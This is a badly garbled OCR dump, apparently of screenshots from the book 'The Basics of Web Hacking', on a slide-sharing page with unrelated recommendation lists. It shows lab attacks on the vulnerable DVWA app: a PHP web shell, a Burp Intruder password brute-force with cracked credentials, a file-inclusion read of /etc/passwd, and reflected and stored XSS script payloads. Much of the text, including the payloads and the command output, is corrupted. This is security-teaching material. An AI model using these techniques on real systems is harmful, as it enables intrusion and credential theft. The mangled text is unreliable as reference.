* Command Shell -127.0.0.1 - MoztHa Firefcot File Edit View History Bookmarks Tools Help 404 Not FoundCommand Shell -127.0.0.1 X + S 127.0.0.1 _j_t _ :oa 2BackTrack unux []Otfensive Security gjExploit-DB Aircrack-ng gjSomaFM [Execute command] [Upload file) [[hinge directory] [File brawler] [Create File] Quick Commands , dal a-# netstat -an | grep -i listen 0 127.0,0.1:7337 0 127.0.0,1:3306 0 0 0-0-0:80 0 ::1:7337 0 127.0,0,1:0030 0 0.0.0,0:* O.G.O.O:* 0-0 0 Q:* LISTEN LISTEN LISTEN LISTEN LISTEN 01 r Screen 0tip Clear Hhrtory tep 0 [ Cen 1 function? tcpG ItcpS 0 * G s t i* [Execute command] [Upload file] [Change directory] [Filebrc wser] [Create File] ww-data-# Is IShel.ljfG_7.php Wvva_eniail .png -data-# ikdir goats WWW-data-# Is |SheU_vG_7.php dvwa_email .png [goatsJ WWW -data # cd goats .Current directory changed to goats WWW-data-# touch bah.txt WWW-data-# Is bah.tKt
Vulnerabifity: Brute Force Login UMtTWTW. caraoji Paii™a E uyn burp intruder repeater window about I target [ prwy f spider~f scanner [ intruder f repeater [ sequencer [ intercept ' options history |_ request to http:Wl 27.0.0.1:60 drop intercept is on f raw [ panam6~7 headers 1 hew |_ GET request to toJlnerabiirties/brute/ forward action valuetype name URL comdoqsusername password Sureareyummy URL login Login cookie PHPSESSID m7cOuorvtemesgddjbv5oj4ue2 cookie lowsecurity
burp intruder repeater window about ( target proxy j' spider scanne intruder ! repeater sequencer decoder comparer options j a intercept§ options J history [ Filter; hiding CS1;, image ;r J general binary content host method URL htt p://safebrqwsmg d.., ’ POST ysafebrowsinqfdowrioads?cItent navdient-auto-ffox6fappver-i6..., http:Ifl27,0,0,1 GET 'Milnerabilit ies/brutej?username-corndogs(*password-surearey... httpiffl27.0,0,1 GET MJlnerabifltiesfbrute/?usemame-comdqgs&password-surearey.,, 457 http://safiebrowsing-c... [GET [/safebrowsing/Td/ChNnb29nLWl hbHdhctnUtc2hhd niFyEAEYht OF(J|... 499 http:/fl27.0,0,1 [GET l/dvwaflsJdvwaPageds SOI ht tp://safebrowsing-c.„ . GET /safebrowsing/rd/chNnb29nLWl hbHdhcmutc2hhdniFyEÿVh.iFijc.., htt p:jYsaf ebrowsing GET rsafebrowsing/rd/chrtnb29mwl hbnd hemutt 2hhd mFyEAflYfcaYRo... * 494 -495 A 502 request [response j _ [ raw f parents f headers T hex | : GET request to MJlnerabilitiesÿbrute/ valuetype name URL corncfogsusername password SLirear&yumnny URL Login Login_ __ m7cbuorvtBm8sgddibv5ojJ ua 2conkie cookie PHPSESSlD lowsecurity
496 HttprOT27.0,0.1 http:W127.0.0, li'vulnerab...sword -sureareyummy&LoqirT- Login j497 499 hTtpiy/U'.-.o.o.i remove item from scope htt p://safebrow501 spider From here actively scan this i send to intruder send to repeater send to sequencer send to comparer (request) send to comparer (response) show response in browser request in browser_ Ihttp;y/safebrowM2 * request [ respons ( raw (' parents [ h GET request to h/ulr type URL usernai URL passwo 'Login PI HP'SE< Secur tj UPL Cookie cookie engagement tools [pro version only] show new history window add comment highlight delete this item clear history copy URL copy links in item save item i target fflHM spider nner f intruder ] repeater sequencer|decoder [ comparer |' optionin'' alerts | £TJ> I target ' positions ' payloads ' options | attack type sniper 5 payload positions GET /vuLntmbi lititsibiut*/ ?us-i:n«i>r-St:or ndog»lft.pjiasword-Jaur tareyunmyS£ Loyin-SLoginJ HTTP/1.I Host: i:7, 0,0.1 Mitr-Acrtnc; Mosuln/S.O (Xil: Llimw liOfi rv:US,U.2> Gecko/ 20100101 Firete*/ 10,0,2 Jtc-oept : tex t!ht ml.app11cat Ion/ n htm1+xml,app i1cat ion/ xml ; q 0.9, / ; q'Q £3 Accept-LAliynaye: en-ua,en:q-0.5 Acctpr-Entodlno; osip, dttlatt Proxy-ConnccE Ion ; lie*p™n Live : tittp://i;7.0,0.1f vulnctah1lit iea/brUEc/ Cookie r PHP3ESS ID»ltB7eduotyttofl30ddybvSo3414*21: aecur ity*S1L>VS DMT: i
- d uwa_usersrtnt IH -gedit File Edit View Search idols Documents i O'tsaye Mopen * <Jvwa_users,tict It asuifi gordonb 1337 pablo smithy) Target Positions I Payloads 1 Options | |7j Payload Sets You (in define one or more payload Sets The number of payload sett depends on the attack customized in different ways Payload count. 2 (appro*!Payload set _ Payload type: Runtime hit ZJ Redueit count: 0 Payload Options (Runtime tilej This payload type Jets you configure a hie from which to read payload itnrgs at runtime Select tile . /dwra users tct
Dadmin password 200 4944 EF apablo letmein 200;ÿ4 4944 smithy password 494610 200 200a? qordonb abt!23 4948
ideally loken HUE:spouse token Joeabon capture options O cookie. O form lieu * manual selection' BBC-U IQ= 64d733(1(14acb9372bCfiedSa6613tf251aÿOct?54 1 501 v Tdssi-Internal OnSi HTTPfi 1 200 Ok Dale Hi. I & Nov 2007 14 33 50 GMT Sewer Apache Set-CPokie B8CNrcrsAjutJtence= Domeshe; paSiÿl; domainÿ bbt ro jk; eÿpiresÿSat, t7-No*2Q07 14:38.50 OhflT Set-Ootids: £BC- UlDÿ 34<J73SdiMac b9872bcSed9a'oB1 afiQSI aSOdeCJ t SOI 091 377ac 4cl M baa25 mmcfllla*2*f%2e0%20%7ficompsbi)te%3s%20m$iE%20?%2e0%3H%2Gv4ndows %20NTO2(K%2et%3b%20lnfoPilk%2e I %3b%20% 2eNCT%20CLR K.202%2e0%2e5 0727%.’9; expires=$aT, 15-nijiaCO 14:3050 OWT; path=i; aomain=i)Dt.oouk, Accept-Range? lute? Cache-Control mav.age=0 token stalls: -mt>=•Slier SXPreSSfOM . al offset t94 lukeii ends: •a!delimiter al fixed length Moul 55 Ear Omaitneo stall capture
Overall result Ths (jveral i quai itv of raniomness wdhin [he sample is eslmaled to be:encefent sign finance level of i % theimounioreflech-e entropy is estirraiedip&e H6 toils effective emi ci|ny The ch-ar; shwi m? nu m her ef tiits ureffective enl ropy at each sign finance leva1, hased t-n aH l?sls Each sign-fican( e I evei dtfines a rr mi mum srflbabiiiv atHie observed insults ectuir iry if mesample is ranaemtvgenerated w»fl ihe prt>:n a biiiiy at(He ptserved result? atemm p falls betel* mi? i mi trefivpomesis ihai ine sampie is ramprinty peneja:ed is rejected o?ing a tpwer sign titan ce level means thatsdonser evid ent e is required to reiect tne nypothesis that:ha sample - 1andem, and so incrants it e chartce ih at nonrandom date w II he treaie d as random *10% Significance level >0.t% >001% >0.0(Jt% 0 to 20 30 40 60 60 70 00 90 190 110 120 tOO 140 160 160 1 70 Number of bits oi enlrony Relinbilfly The analysis, is DsseaonasampieefJtOT tokens 3asec onihe sample sue, tne reliability of tee results is ie*senable no;e hei statistical tesis pnevide eniy?n indicative gjideio me randomness srthe sampled oaia Results coiamed mayconi? n raise pÿmves and negatives and may nonowespend 10 the preclifsi unseietabiirty af :he tokens sampEed.
summarr | cuaretieHiiYei an-aiysla wthev* analysis ] opiums | summary ' FIPS monrftitlgsl ' FIPS soker test ' FIPS runs-[eat flPS[png inns 1esl spetMtegtS toirefabsn ' compression ' pfl comersipr FIPS nmiohfl tod aianificraiioF kwls Wtft - 10ft 1ft 0 tft - O.Olft UPS pass level O.QOtft - 1$ 0001ft 0 JO JO 60 SO 00 I JO 140 160 ISO 200 1*1 irusnron FIPS result 18© bits Passed latest The following 22 bitsfa iledlhe lest D, 1 , 2.7, U. ifi,17, 23, g*. 29, 31. 36. 50 55.56.61 1 59. 161.181, 1 69 tWKXualts 22ir»mat«"ware Idetwnfiifd w mis lesi too few ones al tM 0 (counl 649. orotuLihlv in a i«ndwn san$t* <ts* loin Oj&oijift) loo few ones al b 1 1 (tounl 6£1.p robatllity In a r J ndom sample OH than 0.0001ft) IOD fewOnus al b l 2ftcunl 865. p roba t ility In a random sample: ' ess than Q.OOQ1ft) lOo few ones a1 b 1 7 (coun: S71. n robit ility in a random Sample loss 1han 0 000' ft)
/ T bin etc varusr l IP L-tons of apps passwd _ lib WWW file I |dvwasrc L r I css L r ] images y {includes y r, I J* y
v * root@bt: fvar/www/dvwa File Edit View Terminal Help root@ht:~# Is Desktop DVWA_install,sh localhost-check.nbe ZAp.html rootgbt:-# cd ../ root@bt:/# Is bin dev boot etc lab cdrom hone lost+found opt rootgbt:/# cd var root@bt:/var* Is backups cache lib _ root@bt:/var# cd www root(|bt;/var/www# Is dvwa external 4 initrd.ijng eedia pentest sbin mnt proc root srv usr selinux sys var share vnlinuz local log opt spool www run [JJS yp about.php CHANGELQG.txt config COPYING.tXt index. php instructions. php README.txt robots.txt security.php setup. php php.ini vulnerabilities wstool favicon.ico login.php hackable logout.php ids log.php phpinfo.phpdocs root@bt:/var/www# cd dwa root@bt:/var/www/dvwa# Is css inages includes js root@bt:!va r/www/dvwa# r* n ix
Applications Places System -ÿ - Damn Vulnerable Web App {DVWAJ vl.0.7 :: Vulnerability: File Inclusion - Mozilla Fire1 £ile Edit History gookmarks Joels yelp A SI Damn Vulnerable Web App (DV... + <f3 S. E 127.0.0 1 53BackTrack Li: r |i|offensive Security ng .pomaFM ooncO O:n»t/raoiwivt»tii daemon or i ivsaernori-.usrtj&iri /tiiri.sri om x 2 icinyum junrirsnsirs>};J sys.'dev/tnn.'&h sync u 65334syi ftpoflUpdrarLfeti mailxB.s.niurlAariTnaili/bin'sli MwueSSfnmvaiSvwftpaaltamtiBAlnAri uuefvx lQ:lO:uuep:fV0r'fc{>ea(fLiLicpjbiii/4b pru tm-sJi list* 30 38 MnilinflLlJ!Managtrjarflt5lJbinÿhifCJf:39 39.JrKl AHifÿUjnJrif«JVtJrn/B*i gnalsx'i) 41;Grate Sug-Refiorltng Syilsm [q< ahdJL102:65054:jVarphin/»tt(J Aisrrtfcin/lnolooln landscspÿx103.1OS:Aof niMandfcotw J&lnrfols* ITTC ssagcbusx 104.1 12:JvaWuiiAatm Furahij::106.114 ..‘varfrunyovahi-daemonubin.Tals* SJiortx-107 115 Snc-rt rDS ,ar 1o(j.,sn.ort’,bin.,fjir.E» x 108 6553-’. 'af ,1jb.Tifsi.tin fa I nm.lai' -? fesDvai.a:i12:ÿ9.:-tiorr>C'll0sbvaiA>nrtjiK poatares:x: lOOOiiOOOiÿiomg.'pQsmres.-Tjin.'sn _ Home
5- Malicious script executes s~ÿ— a 2, Send malicious link 6. Cookie is sent User! HackerA. Respond with malicious script * 7. Masquerade as victim 1. Log in +- 3. Send malicious request Web application
Vulnerability: Reflected Cross Site Scripting (XSS) ill's your jRod was here! Hello OK intercept server responses content t/p? [matches [ÿintercept if; H update Content-Length ] @m tent edit iwas modifiedrequestor ras interceptedreqi lestor remove I . and response code does not match "304$ and URL is in target scope up
raw : params i headers j hex . C>£T request to Mjlnerat>ilities/xss_rt valuetype name %2Cscript%3EALERT%20%20JRod+was+ herg%21%20%20%20ÿscnpt%3EURL NAME 10Elrk8vql4s8i kqatneoÿfjfqcookie PHPSESSID lowcookie security burp intruder repeater window about target ] pns*y | sp.der ' | Inlert-apt | options ] history j response frcm httpy/L 2?.O.Q_1:SOMjInprÿh ilRies*ssjffname-%3CSCript%3Eale rt%ig*2JJftod-rwa,s+ here*,JIV.22%23%3CW 2tscript%:i iMruder rfptJter sequencer ' decoder ror'ipir-i options alertsoan'ie' rumaril drop ntorcept ii on action <div C lA33“"lS0dV_|iiHltlÿtl"> <hir'Vulnerability: Reflected Cross Site Scripting |XSS)</hl> <dLv cla*a“"vulti*cAble_cod*_iteA <f urm n«ne-">;S3<' Action-"*" KEhod-"QETH> <p>W1utr a your iumr?</p> <input name-"clam*":* sinj>uc cype="i5tt])wic" VtUue=,,3stibmicM> &cpctsltaiu <3 - ;ÿ ipr. >aJ.ert( "-JRod ||eie " ) c r 1 ]>r ></ pt T> t ' -:i LV>
b-urpK intruder repeater window about spider ! 1 ntruder 1 repeater ; sequencer 1 decoder [ comparer 1 options i aterts itarget *:script •aierBC'Jftod was hefe!!l)</&cnpt> * -he* decode as... |ÿ| encode as ... plain url h t ml heisi asciE he* hex edÿl binary %3c%7ÿ6i3%72%6W70%74%3e%61%6c%6S%72%74%28%22%4a%ÿ2%6f%64%20%77%&l%73%20%63%6S% 72%65%21%22%2&%.3cÿ2r%7 3%& 3%72%fiÿ70%74%3e
| target proxy ' _spider_ intruder_ ' repeater j sequencer decoder ["comparer options | Intercept opttonT~[history ] _ request to http:#127.0.0.1(30 -,i. drop intercept is onforward action ( raw params [ headers-!' hex j GET request to MJlnerabilitiesMsjV valuetype name 1%7 3%20ft6S% 21%22%29%3c%2W73%fe3%72%69%70%74%3e 10tlrkayql4sekkqacneo55fq7 URL NAME Bcookie c or ie PHPSE59ID security low EHe Edit VJew History Bookmark Tjwis Help ffiDamn vulnerable Web ftpp (0V._. S IB Q.qimiifterdUii.Ei&sftss_rÿn-3me=ÿstri(xyaieni-jRortHas hgre!")<%7fscMptJ-ÿ Lmi;n ['Joffensive Security UL*p!cn!-D& Aircnatk-ng jÿrbomaFH
Vulnerability: Reflected Cross Site Scripting (XSS) PHp&eS5iDÿl(KlftSvql4s8l<kq4CfW55fq7; s«urity=ioiN
4, Malicious script executes A S. Cookie is sent User 3, Respond with maliciousscript Hacker Masquerade as victim - - Web application 2. View vulnerable page while authenticated 1. Plant stored XSS attack
Vulnerability: Stored Cross Site Scripting (XSS) Nam* *-&cnpt>alerirThe Fed* are walctnng ros"Ji<JStnpt> Message ’ A Vulnerability: Stored Cross Site Scripting (XSS) Name ' The Feds ere watching me Message 1 i OK Kane: lesl Message: This is a lest comment. Name: Dave Message. I like hugs Marne- Kenh Message:
The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Select from the menu: 1) Social-Engineering Attacks 2} Fast-Track Penetration Testing 3} Third Party Modules 4) Update the Hetasploit Framework 5) Update the Social -Engineer Toolkit 6) Update SET configuration 7) Help, Credits, and About 99) Exit the Social -Engineer Toolkit in set*|
tuuitter Twitter Is over capacity. H 'i of1w e»5* I.w U>J*TVt C**W1 Irÿrt tr- m*s *6* tQi Pinny
•• PAGE NOT FOUND (p.s, see you soon)
. : 0 W 2 0 z *S>>(ft THE BASICSOF WEB HACKING Todsand Techniques toAttack the Web 1 i |B in i r i : i i II in Josh Paul '

Recommended

Marko Gargenta_Remixing android
Marko Gargenta_Remixing androidMarko Gargenta_Remixing android
Marko Gargenta_Remixing androidDroidcon Berlin
 
17. pengantar teknik pondasi
17. pengantar teknik pondasi17. pengantar teknik pondasi
17. pengantar teknik pondasi
KHRISTIAN MAUKO
 
How to win every argument
How to win every argumentHow to win every argument
How to win every argument
Albertz Ace-Red
 
Encyclopedia britannica
Encyclopedia britannicaEncyclopedia britannica
Encyclopedia britannica
Albertz Ace-Red
 
The entity framework 4 and asp net web forms
The entity framework 4 and asp net web formsThe entity framework 4 and asp net web forms
The entity framework 4 and asp net web forms
Albertz Ace-Red
 
Membuat aplikasi java web enterprise sederhana
Membuat aplikasi java web enterprise sederhanaMembuat aplikasi java web enterprise sederhana
Membuat aplikasi java web enterprise sederhanaAlbertz Ace-Red
 
Belajar php
Belajar phpBelajar php
Belajar php
Albertz Ace-Red
 
Hackers heroes of the computer revolution
Hackers heroes of the computer revolutionHackers heroes of the computer revolution
Hackers heroes of the computer revolution
Albertz Ace-Red
 

Recommended

Marko Gargenta_Remixing android
Marko Gargenta_Remixing androidMarko Gargenta_Remixing android
Marko Gargenta_Remixing androidDroidcon Berlin
 
17. pengantar teknik pondasi
17. pengantar teknik pondasi17. pengantar teknik pondasi
17. pengantar teknik pondasi
KHRISTIAN MAUKO
 
How to win every argument
How to win every argumentHow to win every argument
How to win every argument
Albertz Ace-Red
 
Encyclopedia britannica
Encyclopedia britannicaEncyclopedia britannica
Encyclopedia britannica
Albertz Ace-Red
 
The entity framework 4 and asp net web forms
The entity framework 4 and asp net web formsThe entity framework 4 and asp net web forms
The entity framework 4 and asp net web forms
Albertz Ace-Red
 
Membuat aplikasi java web enterprise sederhana
Membuat aplikasi java web enterprise sederhanaMembuat aplikasi java web enterprise sederhana
Membuat aplikasi java web enterprise sederhanaAlbertz Ace-Red
 
Belajar php
Belajar phpBelajar php
Belajar php
Albertz Ace-Red
 
Hackers heroes of the computer revolution
Hackers heroes of the computer revolutionHackers heroes of the computer revolution
Hackers heroes of the computer revolution
Albertz Ace-Red
 
Biological control systems - System Concepts-Mathankumar.S, VMKVEC
Biological control systems - System Concepts-Mathankumar.S, VMKVECBiological control systems - System Concepts-Mathankumar.S, VMKVEC
Biological control systems - System Concepts-Mathankumar.S, VMKVEC
Mathankumar S
 
2. Morwyn certs
2. Morwyn certs2. Morwyn certs
2. Morwyn certsmorwyn hartze
 
DIPLOMES
DIPLOMESDIPLOMES
DIPLOMESAchour Mokrab
 
Saudi Aramco Material System Specifications (SAMSS) 6
Saudi Aramco Material System Specifications (SAMSS) 6Saudi Aramco Material System Specifications (SAMSS) 6
Saudi Aramco Material System Specifications (SAMSS) 6ROBERTO BATAHOY GAMALE JR
 
Howard certificates
Howard certificatesHoward certificates
Howard certificatesHoward Heydenrych
 
EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)
EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)
EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)
MorarjiEr
 
Kumba letter for CV.PDF
Kumba letter for CV.PDFKumba letter for CV.PDF
Kumba letter for CV.PDFWillem Oosthuizen
 
Kumba letter for CV.PDF
Kumba letter for CV.PDFKumba letter for CV.PDF
Kumba letter for CV.PDFWillem Oosthuizen
 
Production Script
Production ScriptProduction Script
Production Script
exposure_eu
 
Easiest word learning methods with bangla
Easiest word learning methods with banglaEasiest word learning methods with bangla
Easiest word learning methods with bangla
eBook.com.bd (প্রয়োজনীয় বাংলা বই)
 
Vista verde -_orchid_-_brochure_with_unit_types (1)
Vista verde -_orchid_-_brochure_with_unit_types (1)Vista verde -_orchid_-_brochure_with_unit_types (1)
Vista verde -_orchid_-_brochure_with_unit_types (1)
lynnho223
 
越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand
越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand
越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand
Huttons Real Estate Group
 
Comman.pdf
Comman.pdfComman.pdf
Comman.pdf
AryanSahay4
 
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVEC
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVECBiological control systems - Time Response Analysis - S.Mathankumar-VMKVEC
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVEC
Mathankumar S
 
Spring natraj-satya-best
Spring natraj-satya-bestSpring natraj-satya-best
Spring natraj-satya-best
Satya Johnny
 
Attachment Documents.PDF
Attachment Documents.PDFAttachment Documents.PDF
Attachment Documents.PDFRomulo Labayne Bedia
 
Mt external
Mt externalMt external
Mt external
kravibsnl
 
Struts Notes
Struts NotesStruts Notes
Struts Notes
Sreenivasulu Gonuguntla
 
Trinity Daily Tour Edition Sept 20, 2016
Trinity Daily Tour Edition Sept 20, 2016Trinity Daily Tour Edition Sept 20, 2016
Trinity Daily Tour Edition Sept 20, 2016
Arun Surendran
 
Spring complete notes natraz
Spring complete notes natrazSpring complete notes natraz
Spring complete notes natraz
Pavan Kirshna
 
The French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free downloadThe French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free download
Vivekanand Anglo Vedic Academy
 
Group Presentation 2 Economics.Ariana Buscigliopptx
Group Presentation 2 Economics.Ariana BuscigliopptxGroup Presentation 2 Economics.Ariana Buscigliopptx
Group Presentation 2 Economics.Ariana Buscigliopptx
ArianaBusciglio
 

More Related Content

Similar to The basics web hacking

Biological control systems - System Concepts-Mathankumar.S, VMKVEC
Biological control systems - System Concepts-Mathankumar.S, VMKVECBiological control systems - System Concepts-Mathankumar.S, VMKVEC
Biological control systems - System Concepts-Mathankumar.S, VMKVEC
Mathankumar S
 
Saudi Aramco Material System Specifications (SAMSS) 6
Saudi Aramco Material System Specifications (SAMSS) 6Saudi Aramco Material System Specifications (SAMSS) 6
Saudi Aramco Material System Specifications (SAMSS) 6ROBERTO BATAHOY GAMALE JR
 
EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)
EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)
EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)
MorarjiEr
 
Production Script
Production ScriptProduction Script
Production Script
exposure_eu
 
Easiest word learning methods with bangla
Easiest word learning methods with banglaEasiest word learning methods with bangla
Easiest word learning methods with bangla
eBook.com.bd (প্রয়োজনীয় বাংলা বই)
 
Vista verde -_orchid_-_brochure_with_unit_types (1)
Vista verde -_orchid_-_brochure_with_unit_types (1)Vista verde -_orchid_-_brochure_with_unit_types (1)
Vista verde -_orchid_-_brochure_with_unit_types (1)
lynnho223
 
越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand
越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand
越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand
Huttons Real Estate Group
 
Comman.pdf
Comman.pdfComman.pdf
Comman.pdf
AryanSahay4
 
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVEC
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVECBiological control systems - Time Response Analysis - S.Mathankumar-VMKVEC
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVEC
Mathankumar S
 
Spring natraj-satya-best
Spring natraj-satya-bestSpring natraj-satya-best
Spring natraj-satya-best
Satya Johnny
 
Mt external
Mt externalMt external
Mt external
kravibsnl
 
Struts Notes
Struts NotesStruts Notes
Struts Notes
Sreenivasulu Gonuguntla
 
Trinity Daily Tour Edition Sept 20, 2016
Trinity Daily Tour Edition Sept 20, 2016Trinity Daily Tour Edition Sept 20, 2016
Trinity Daily Tour Edition Sept 20, 2016
Arun Surendran
 
Spring complete notes natraz
Spring complete notes natrazSpring complete notes natraz
Spring complete notes natraz
Pavan Kirshna
 

Similar to The basics web hacking (20)

Biological control systems - System Concepts-Mathankumar.S, VMKVEC
Biological control systems - System Concepts-Mathankumar.S, VMKVECBiological control systems - System Concepts-Mathankumar.S, VMKVEC
Biological control systems - System Concepts-Mathankumar.S, VMKVEC
 
2. Morwyn certs
2. Morwyn certs2. Morwyn certs
2. Morwyn certs
 
DIPLOMES
DIPLOMESDIPLOMES
DIPLOMES
 
Saudi Aramco Material System Specifications (SAMSS) 6
Saudi Aramco Material System Specifications (SAMSS) 6Saudi Aramco Material System Specifications (SAMSS) 6
Saudi Aramco Material System Specifications (SAMSS) 6
 
Howard certificates
Howard certificatesHoward certificates
Howard certificates
 
EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)
EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)
EC8452-ELECTRONIC CIRCUITS II (Handwritten Notes)
 
Kumba letter for CV.PDF
Kumba letter for CV.PDFKumba letter for CV.PDF
Kumba letter for CV.PDF
 
Kumba letter for CV.PDF
Kumba letter for CV.PDFKumba letter for CV.PDF
Kumba letter for CV.PDF
 
Production Script
Production ScriptProduction Script
Production Script
 
Easiest word learning methods with bangla
Easiest word learning methods with banglaEasiest word learning methods with bangla
Easiest word learning methods with bangla
 
Vista verde -_orchid_-_brochure_with_unit_types (1)
Vista verde -_orchid_-_brochure_with_unit_types (1)Vista verde -_orchid_-_brochure_with_unit_types (1)
Vista verde -_orchid_-_brochure_with_unit_types (1)
 
越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand
越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand
越南胡志明市.Vista Verde @HCMC, Vietnam by CapitaLand
 
Comman.pdf
Comman.pdfComman.pdf
Comman.pdf
 
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVEC
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVECBiological control systems - Time Response Analysis - S.Mathankumar-VMKVEC
Biological control systems - Time Response Analysis - S.Mathankumar-VMKVEC
 
Spring natraj-satya-best
Spring natraj-satya-bestSpring natraj-satya-best
Spring natraj-satya-best
 
Attachment Documents.PDF
Attachment Documents.PDFAttachment Documents.PDF
Attachment Documents.PDF
 
Mt external
Mt externalMt external
Mt external
 
Struts Notes
Struts NotesStruts Notes
Struts Notes
 
Trinity Daily Tour Edition Sept 20, 2016
Trinity Daily Tour Edition Sept 20, 2016Trinity Daily Tour Edition Sept 20, 2016
Trinity Daily Tour Edition Sept 20, 2016
 
Spring complete notes natraz
Spring complete notes natrazSpring complete notes natraz
Spring complete notes natraz
 

Recently uploaded

The French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free downloadThe French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free download
Vivekanand Anglo Vedic Academy
 
Group Presentation 2 Economics.Ariana Buscigliopptx
Group Presentation 2 Economics.Ariana BuscigliopptxGroup Presentation 2 Economics.Ariana Buscigliopptx
Group Presentation 2 Economics.Ariana Buscigliopptx
ArianaBusciglio
 
The Accursed House by Émile Gaboriau.pptx
The Accursed House by Émile Gaboriau.pptxThe Accursed House by Émile Gaboriau.pptx
The Accursed House by Émile Gaboriau.pptx
DhatriParmar
 
The approach at University of Liverpool.pptx
The approach at University of Liverpool.pptxThe approach at University of Liverpool.pptx
The approach at University of Liverpool.pptx
Jisc
 
Home assignment II on Spectroscopy 2024 Answers.pdf
Home assignment II on Spectroscopy 2024 Answers.pdfHome assignment II on Spectroscopy 2024 Answers.pdf
Home assignment II on Spectroscopy 2024 Answers.pdf
Tamralipta Mahavidyalaya
 
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdfWelcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
TechSoup
 
A Strategic Approach: GenAI in Education
A Strategic Approach: GenAI in EducationA Strategic Approach: GenAI in Education
A Strategic Approach: GenAI in Education
Peter Windle
 
Thesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.pptThesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.ppt
EverAndrsGuerraGuerr
 
Honest Reviews of Tim Han LMA Course Program.pptx
Honest Reviews of Tim Han LMA Course Program.pptxHonest Reviews of Tim Han LMA Course Program.pptx
Honest Reviews of Tim Han LMA Course Program.pptx
timhan337
 
A Survey of Techniques for Maximizing LLM Performance.pptx
A Survey of Techniques for Maximizing LLM Performance.pptxA Survey of Techniques for Maximizing LLM Performance.pptx
A Survey of Techniques for Maximizing LLM Performance.pptx
thanhdowork
 
Model Attribute Check Company Auto Property
Model Attribute Check Company Auto PropertyModel Attribute Check Company Auto Property
Model Attribute Check Company Auto Property
Celine George
 
Unit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdfUnit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdf
Thiyagu K
 
Supporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptxSupporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptx
Jisc
 
The basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptxThe basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptx
heathfieldcps1
 
Chapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptxChapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptx
Mohd Adib Abd Muin, Senior Lecturer at Universiti Utara Malaysia
 
1.4 modern child centered education - mahatma gandhi-2.pptx
1.4 modern child centered education - mahatma gandhi-2.pptx1.4 modern child centered education - mahatma gandhi-2.pptx
1.4 modern child centered education - mahatma gandhi-2.pptx
JosvitaDsouza2
 
2024.06.01 Introducing a competency framework for languag learning materials ...
2024.06.01 Introducing a competency framework for languag learning materials ...2024.06.01 Introducing a competency framework for languag learning materials ...
2024.06.01 Introducing a competency framework for languag learning materials ...
Sandy Millin
 
Introduction to AI for Nonprofits with Tapp Network
Introduction to AI for Nonprofits with Tapp NetworkIntroduction to AI for Nonprofits with Tapp Network
Introduction to AI for Nonprofits with Tapp Network
TechSoup
 
Marketing internship report file for MBA
Marketing internship report file for MBAMarketing internship report file for MBA
Marketing internship report file for MBA
gb193092
 
Unit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdfUnit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdf
Thiyagu K
 

Recently uploaded (20)

The French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free downloadThe French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free download
 
Group Presentation 2 Economics.Ariana Buscigliopptx
Group Presentation 2 Economics.Ariana BuscigliopptxGroup Presentation 2 Economics.Ariana Buscigliopptx
Group Presentation 2 Economics.Ariana Buscigliopptx
 
The Accursed House by Émile Gaboriau.pptx
The Accursed House by Émile Gaboriau.pptxThe Accursed House by Émile Gaboriau.pptx
The Accursed House by Émile Gaboriau.pptx
 
The approach at University of Liverpool.pptx
The approach at University of Liverpool.pptxThe approach at University of Liverpool.pptx
The approach at University of Liverpool.pptx
 
